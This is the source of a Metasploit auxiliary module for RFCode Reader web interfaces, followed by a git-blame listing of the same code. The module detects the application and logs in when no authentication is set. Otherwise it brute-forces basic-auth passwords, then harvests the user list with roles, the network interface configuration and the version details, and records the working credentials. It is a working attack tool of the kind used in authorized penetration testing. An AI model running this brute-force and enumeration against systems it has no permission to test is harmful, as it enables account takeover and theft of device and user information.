modules/auxiliary/scanner/http/rfcode_reader_enum.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'RFCode Reader Web Interface Login / Bruteforce Utility',
      'Description'    => %{
        This module simply attempts to login to a RFCode Reader web interface.
        Please note that by default there is no authentication. In such a case, password brute force will not be performed.
        If there is authentication configured, the module will attempt to find valid login credentials and capture device information.
      },
      'Author'         =>
        [
          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
        ],
      'License'	 => MSF_LICENSE

    ))

    register_options(
      [
        OptBool.new('STOP_ON_SUCCESS', [ true, "Stop guessing when a credential works for a host", true])
      ])

  end

  #
  # Info-Only
  # Identify logged in user: /rfcode_reader/api/whoami.json
  # Capture list of users: /rfcode_reader/api/userlist.json
  # Interface configuration: /rfcode_reader/api/interfacestatus.json
  # Device platform details: /rfcode_reader/api/version.json
  #

  def run_host(ip)
    unless is_app_rfreader?
      print_error("#{rhost}:#{rport} - Application does not appear to be RFCode Reader. Module will not continue.")
      return
    end

    print_status("#{rhost}:#{rport} - Checking if authentication is required...")
    unless is_auth_required?
      print_warning("#{rhost}:#{rport} - Application does not require authentication.")
      user = ''
      pass = ''

      # Collect device platform & configuration info
      collect_info(user, pass)
      return
    end

    print_status("#{rhost}:#{rport} - Brute-forcing...")
    each_user_pass do |user, pass|
      do_login(user, pass)
    end
  end

  #
  # What's the point of running this module if the app actually isn't RFCode Reader?
  #
  def is_app_rfreader?
    res = send_request_cgi(
      {
        'uri' => '/rfcode_reader/api/whoami.json',
        'vars_get' =>
          {
            '_dc' => '1369680704481'
          }
      })
    return (res and res.code != 404)
  end

  #
  # The default install of RFCode Reader app does not require authentication. Instead, it'll log the
  # user right in. If that's the case, no point to brute-force, either.
  #
  def is_auth_required?
    user = ''
    pass = ''

    res = send_request_cgi(
      {
        'uri'       => '/rfcode_reader/api/whoami.json',
        'method'    => 'GET',
        'authorization' => basic_auth(user,pass),
        'vars_get'	=>
          {
            '_dc' => '1369680704481'
          }
      })

    return (res and res.body =~ /{  }/) ? false : true
  end

  #
  # Brute-force the login page
  #
  def do_login(user, pass)

    vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
    begin
      res = send_request_cgi(
      {
        'uri'       => '/rfcode_reader/api/whoami.json',
        'method'    => 'GET',
        'authorization' => basic_auth(user,pass),
        'vars_get'	=>
          {
            '_dc' => '1369680704481'
          }
      })

      if not res or res.code == 401
        vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}")
      else
        print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")

        collect_info(user, pass)

        report_cred(
          ip: rhost,
          port: rport,
          service_name: 'RFCode Reader',
          user: user,
          password: pass,
          proof: res.code.to_s
        )
        return :next_user
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
      print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
      return :abort
    end
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: Time.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  #
  # Collect target info
  #
  def collect_info(user, pass)

    vprint_status("#{rhost}:#{rport} - Collecting information from app as #{user.inspect}:#{pass.inspect}...")
    begin

      res = send_request_cgi(
      {
        'uri'       => '/rfcode_reader/api/version.json',
        'method'    => 'GET',
        'authorization' => basic_auth(user,pass),
        'vars_get'      =>
          {
            '_dc' => '1370460180056'
          }
      })

      if res and res.body
        release_ver = JSON.parse(res.body)["release"]
        product_name = JSON.parse(res.body)["product"]

        vprint_status("#{rhost}:#{rport} - Collecting device platform info...")
        vprint_good("#{rhost}:#{rport} - Release version: '#{release_ver}', Product Name: '#{product_name}'")

        report_note(
          :host   => rhost,
          :proto  => 'tcp',
          :port   => rport,
          :sname  => "RFCode Reader",
          :data   => "Release Version: #{release_ver}, Product: #{product_name}",
          :type	=> 'Info'
        )
      end

      res = send_request_cgi(
      {
        'uri'       => '/rfcode_reader/api/userlist.json',
        'method'    => 'GET',
        'authorization' => basic_auth(user,pass),
        'vars_get'      =>
          {
            '_dc' => '1370353972710'
          }
      })

      if res and res.body
        userlist = JSON.parse(res.body)
        vprint_status("#{rhost}:#{rport} - Collecting user list...")
        vprint_good("#{rhost}:#{rport} - User list & role: #{userlist}")

        report_note(
          :host   => rhost,
          :proto  => 'tcp',
          :port   => rport,
          :sname	=> "RFCode Reader",
          :data   => "User List & Roles: #{userlist}",
          :type	=> 'Info'
        )
      end

      res = send_request_cgi(
      {
        'uri'       => '/rfcode_reader/api/interfacestatus.json',
        'method'    => 'GET',
        'authorization' => basic_auth(user,pass),
        'vars_get'      =>
          {
            '_dc' => '1369678668067'
          }
      })

      if res and res.body
        eth0_info = JSON.parse(res.body)["eth0"]
        vprint_status("#{rhost}:#{rport} - Collecting interface info...")
        vprint_good("#{rhost}:#{rport} - Interface eth0 info: #{eth0_info}")

        report_note(
          :host	=> rhost,
          :proto	=> 'tcp',
          :port	=> rport,
          :sname	=> "RFCode Reader",
          :data	=> "Interface eth0: #{eth0_info}",
          :type	=> 'Info'
        )
      end

      return
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed while collecting info")
      return
    rescue JSON::ParserError
      vprint_error("#{rhost}:#{rport} - Unable to parse JSON response while collecting info")
      return
    end
  end
end
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
Updated rfcode_reader_enum.rb ... 2013-06-08 03:21:43 +05:30			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Auxiliary::Report`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`include Msf::Auxiliary::AuthBrute`
			`include Msf::Auxiliary::Scanner`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`def initialize(info={})`
			`super(update_info(info,`
Tidying up grammar and titles 2013-06-17 16:48:30 -05:00			`'Name' => 'RFCode Reader Web Interface Login / Bruteforce Utility',`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`'Description' => %{`
added report_note to store collected info. removed register rport for 80t. msftidy & module load checked. pushing it up. 2013-06-11 12:57:26 +05:30			`This module simply attempts to login to a RFCode Reader web interface.`
			`Please note that by default there is no authentication. In such a case, password brute force will not be performed.`
			`If there is authentication configured, the module will attempt to find valid login credentials and capture device information.`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`},`
			`'Author' =>`
			`[`
			`'Karn Ganeshen <KarnGaneshen[at]gmail.com>'`
			`],`
Update rfcode_reader_enum.rb 2013-06-08 01:00:18 +05:30			`'License' => MSF_LICENSE`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`))`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`register_options(`
			`[`
Final cleanup for rfcode_reader_enum 2013-06-14 13:09:48 -05:00			`OptBool.new('STOP_ON_SUCCESS', [ true, "Stop guessing when a credential works for a host", true])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`#`
			`# Info-Only`
setting rfcode_reader_enum straight. more updates. 2013-06-10 22:57:00 +05:30			`# Identify logged in user: /rfcode_reader/api/whoami.json`
			`# Capture list of users: /rfcode_reader/api/userlist.json`
			`# Interface configuration: /rfcode_reader/api/interfacestatus.json`
			`# Device platform details: /rfcode_reader/api/version.json`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`#`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`def run_host(ip)`
Update rfcode_reader_enum.rb 2013-06-08 01:00:18 +05:30			`unless is_app_rfreader?`
added note :type - Info. This is mandatory field for report_note. also, vprint statements seem to be adding an extra space with a hyphen. kinda make print dis-aligned than other regular print_* statements. changed -> to -, removed ' from '#{user/pass}'. works fine. msftidy check. module load check. pcap taken. 2013-06-13 14:03:55 +05:30			`print_error("#{rhost}:#{rport} - Application does not appear to be RFCode Reader. Module will not continue.")`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
added note :type - Info. This is mandatory field for report_note. also, vprint statements seem to be adding an extra space with a hyphen. kinda make print dis-aligned than other regular print_* statements. changed -> to -, removed ' from '#{user/pass}'. works fine. msftidy check. module load check. pcap taken. 2013-06-13 14:03:55 +05:30			`print_status("#{rhost}:#{rport} - Checking if authentication is required...")`
Update rfcode_reader_enum.rb 2013-06-08 01:00:18 +05:30			`unless is_auth_required?`
added note :type - Info. This is mandatory field for report_note. also, vprint statements seem to be adding an extra space with a hyphen. kinda make print dis-aligned than other regular print_* statements. changed -> to -, removed ' from '#{user/pass}'. works fine. msftidy check. module load check. pcap taken. 2013-06-13 14:03:55 +05:30			`print_warning("#{rhost}:#{rport} - Application does not require authentication.")`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`user = ''`
			`pass = ''`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`# Collect device platform & configuration info`
			`collect_info(user, pass)`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
added note :type - Info. This is mandatory field for report_note. also, vprint statements seem to be adding an extra space with a hyphen. kinda make print dis-aligned than other regular print_* statements. changed -> to -, removed ' from '#{user/pass}'. works fine. msftidy check. module load check. pcap taken. 2013-06-13 14:03:55 +05:30			`print_status("#{rhost}:#{rport} - Brute-forcing...")`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`each_user_pass do \|user, pass\|`
			`do_login(user, pass)`
			`end`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`#`
			`# What's the point of running this module if the app actually isn't RFCode Reader?`
			`#`
			`def is_app_rfreader?`
setting rfcode_reader_enum straight. more updates. 2013-06-10 22:57:00 +05:30			`res = send_request_cgi(`
			`{`
			`'uri' => '/rfcode_reader/api/whoami.json',`
			`'vars_get' =>`
			`{`
			`'_dc' => '1369680704481'`
			`}`
			`})`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`return (res and res.code != 404)`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`#`
			`# The default install of RFCode Reader app does not require authentication. Instead, it'll log the`
			`# user right in. If that's the case, no point to brute-force, either.`
			`#`
			`def is_auth_required?`
			`user = ''`
			`pass = ''`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`res = send_request_cgi(`
			`{`
setting rfcode_reader_enum straight. more updates. 2013-06-10 22:57:00 +05:30			`'uri' => '/rfcode_reader/api/whoami.json',`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`'method' => 'GET',`
setting rfcode_reader_enum straight. more updates. 2013-06-10 22:57:00 +05:30			`'authorization' => basic_auth(user,pass),`
			`'vars_get' =>`
			`{`
			`'_dc' => '1369680704481'`
			`}`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`})`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`return (res and res.body =~ /{ }/) ? false : true`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`#`
			`# Brute-force the login page`
			`#`
			`def do_login(user, pass)`
Retab modules 2013-08-30 16:28:54 -05:00
added note :type - Info. This is mandatory field for report_note. also, vprint statements seem to be adding an extra space with a hyphen. kinda make print dis-aligned than other regular print_* statements. changed -> to -, removed ' from '#{user/pass}'. works fine. msftidy check. module load check. pcap taken. 2013-06-13 14:03:55 +05:30			`vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`begin`
			`res = send_request_cgi(`
			`{`
setting rfcode_reader_enum straight. more updates. 2013-06-10 22:57:00 +05:30			`'uri' => '/rfcode_reader/api/whoami.json',`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`'method' => 'GET',`
setting rfcode_reader_enum straight. more updates. 2013-06-10 22:57:00 +05:30			`'authorization' => basic_auth(user,pass),`
			`'vars_get' =>`
			`{`
			`'_dc' => '1369680704481'`
			`}`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`})`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`if not res or res.code == 401`
added note :type - Info. This is mandatory field for report_note. also, vprint statements seem to be adding an extra space with a hyphen. kinda make print dis-aligned than other regular print_* statements. changed -> to -, removed ' from '#{user/pass}'. works fine. msftidy check. module load check. pcap taken. 2013-06-13 14:03:55 +05:30			`vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}")`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`else`
added note :type - Info. This is mandatory field for report_note. also, vprint statements seem to be adding an extra space with a hyphen. kinda make print dis-aligned than other regular print_* statements. changed -> to -, removed ' from '#{user/pass}'. works fine. msftidy check. module load check. pcap taken. 2013-06-13 14:03:55 +05:30			`print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`collect_info(user, pass)`
Retab modules 2013-08-30 16:28:54 -05:00
Modate update on using metasploit-credential 2015-07-23 18:07:19 -05:00			`report_cred(`
			`ip: rhost,`
			`port: rport,`
			`service_name: 'RFCode Reader',`
			`user: user,`
			`password: pass,`
			`proof: res.code.to_s`
			`)`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`return :next_user`
			`end`
Update rfcode_reader_enum.rb 2013-06-08 01:00:18 +05:30			`rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE`
added note :type - Info. This is mandatory field for report_note. also, vprint statements seem to be adding an extra space with a hyphen. kinda make print dis-aligned than other regular print_* statements. changed -> to -, removed ' from '#{user/pass}'. works fine. msftidy check. module load check. pcap taken. 2013-06-13 14:03:55 +05:30			`print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`return :abort`
			`end`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Modate update on using metasploit-credential 2015-07-23 18:07:19 -05:00			`def report_cred(opts)`
			`service_data = {`
			`address: opts[:ip],`
			`port: opts[:port],`
			`service_name: opts[:service_name],`
			`protocol: 'tcp',`
			`workspace_id: myworkspace_id`
			`}`

			`credential_data = {`
			`origin_type: :service,`
			`module_fullname: fullname,`
			`username: opts[:user],`
			`private_data: opts[:password],`
			`private_type: :password`
			`}.merge(service_data)`

			`login_data = {`
			`last_attempted_at: Time.now,`
			`core: create_credential(credential_data),`
			`status: Metasploit::Model::Login::Status::SUCCESSFUL,`
			`proof: opts[:proof]`
			`}.merge(service_data)`

			`create_credential_login(login_data)`
			`end`

Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`#`
			`# Collect target info`
			`#`
			`def collect_info(user, pass)`
Retab modules 2013-08-30 16:28:54 -05:00
added note :type - Info. This is mandatory field for report_note. also, vprint statements seem to be adding an extra space with a hyphen. kinda make print dis-aligned than other regular print_* statements. changed -> to -, removed ' from '#{user/pass}'. works fine. msftidy check. module load check. pcap taken. 2013-06-13 14:03:55 +05:30			`vprint_status("#{rhost}:#{rport} - Collecting information from app as #{user.inspect}:#{pass.inspect}...")`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`begin`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`res = send_request_cgi(`
Updated rfcode_reader_enum.rb ... 2013-06-08 03:21:43 +05:30			`{`
setting rfcode_reader_enum straight. more updates. 2013-06-10 22:57:00 +05:30			`'uri' => '/rfcode_reader/api/version.json',`
Updated rfcode_reader_enum.rb ... 2013-06-08 03:21:43 +05:30			`'method' => 'GET',`
setting rfcode_reader_enum straight. more updates. 2013-06-10 22:57:00 +05:30			`'authorization' => basic_auth(user,pass),`
			`'vars_get' =>`
			`{`
			`'_dc' => '1370460180056'`
			`}`
Updated rfcode_reader_enum.rb ... 2013-06-08 03:21:43 +05:30			`})`
Retab modules 2013-08-30 16:28:54 -05:00
Final cleanup for rfcode_reader_enum 2013-06-14 13:09:48 -05:00			`if res and res.body`
			`release_ver = JSON.parse(res.body)["release"]`
			`product_name = JSON.parse(res.body)["product"]`
Retab modules 2013-08-30 16:28:54 -05:00
Final cleanup for rfcode_reader_enum 2013-06-14 13:09:48 -05:00			`vprint_status("#{rhost}:#{rport} - Collecting device platform info...")`
			`vprint_good("#{rhost}:#{rport} - Release version: '#{release_ver}', Product Name: '#{product_name}'")`
Retab modules 2013-08-30 16:28:54 -05:00
Final cleanup for rfcode_reader_enum 2013-06-14 13:09:48 -05:00			`report_note(`
			`:host => rhost,`
			`:proto => 'tcp',`
			`:port => rport,`
			`:sname => "RFCode Reader",`
			`:data => "Release Version: #{release_ver}, Product: #{product_name}",`
			`:type => 'Info'`
			`)`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`res = send_request_cgi(`
			`{`
setting rfcode_reader_enum straight. more updates. 2013-06-10 22:57:00 +05:30			`'uri' => '/rfcode_reader/api/userlist.json',`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`'method' => 'GET',`
setting rfcode_reader_enum straight. more updates. 2013-06-10 22:57:00 +05:30			`'authorization' => basic_auth(user,pass),`
			`'vars_get' =>`
			`{`
			`'_dc' => '1370353972710'`
			`}`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`})`
Retab modules 2013-08-30 16:28:54 -05:00
Final cleanup for rfcode_reader_enum 2013-06-14 13:09:48 -05:00			`if res and res.body`
			`userlist = JSON.parse(res.body)`
			`vprint_status("#{rhost}:#{rport} - Collecting user list...")`
			`vprint_good("#{rhost}:#{rport} - User list & role: #{userlist}")`
Retab modules 2013-08-30 16:28:54 -05:00
Final cleanup for rfcode_reader_enum 2013-06-14 13:09:48 -05:00			`report_note(`
			`:host => rhost,`
			`:proto => 'tcp',`
			`:port => rport,`
			`:sname => "RFCode Reader",`
			`:data => "User List & Roles: #{userlist}",`
			`:type => 'Info'`
			`)`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`res = send_request_cgi(`
Updated rfcode_reader_enum.rb ... 2013-06-08 03:21:43 +05:30			`{`
setting rfcode_reader_enum straight. more updates. 2013-06-10 22:57:00 +05:30			`'uri' => '/rfcode_reader/api/interfacestatus.json',`
Updated rfcode_reader_enum.rb ... 2013-06-08 03:21:43 +05:30			`'method' => 'GET',`
setting rfcode_reader_enum straight. more updates. 2013-06-10 22:57:00 +05:30			`'authorization' => basic_auth(user,pass),`
			`'vars_get' =>`
			`{`
			`'_dc' => '1369678668067'`
			`}`
Updated rfcode_reader_enum.rb ... 2013-06-08 03:21:43 +05:30			`})`
Retab modules 2013-08-30 16:28:54 -05:00
Final cleanup for rfcode_reader_enum 2013-06-14 13:09:48 -05:00			`if res and res.body`
			`eth0_info = JSON.parse(res.body)["eth0"]`
			`vprint_status("#{rhost}:#{rport} - Collecting interface info...")`
			`vprint_good("#{rhost}:#{rport} - Interface eth0 info: #{eth0_info}")`
Retab modules 2013-08-30 16:28:54 -05:00
Final cleanup for rfcode_reader_enum 2013-06-14 13:09:48 -05:00			`report_note(`
			`:host => rhost,`
			`:proto => 'tcp',`
			`:port => rport,`
			`:sname => "RFCode Reader",`
			`:data => "Interface eth0: #{eth0_info}",`
			`:type => 'Info'`
			`)`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Final cleanup for rfcode_reader_enum 2013-06-14 13:09:48 -05:00			`return`
			`rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE`
			`vprint_error("#{rhost}:#{rport} - HTTP Connection Failed while collecting info")`
			`return`
			`rescue JSON::ParserError`
			`vprint_error("#{rhost}:#{rport} - Unable to parse JSON response while collecting info")`
Create rfcode_reader_enum.rb 2013-06-07 23:53:09 +05:30			`return`
			`end`
			`end`
			`end`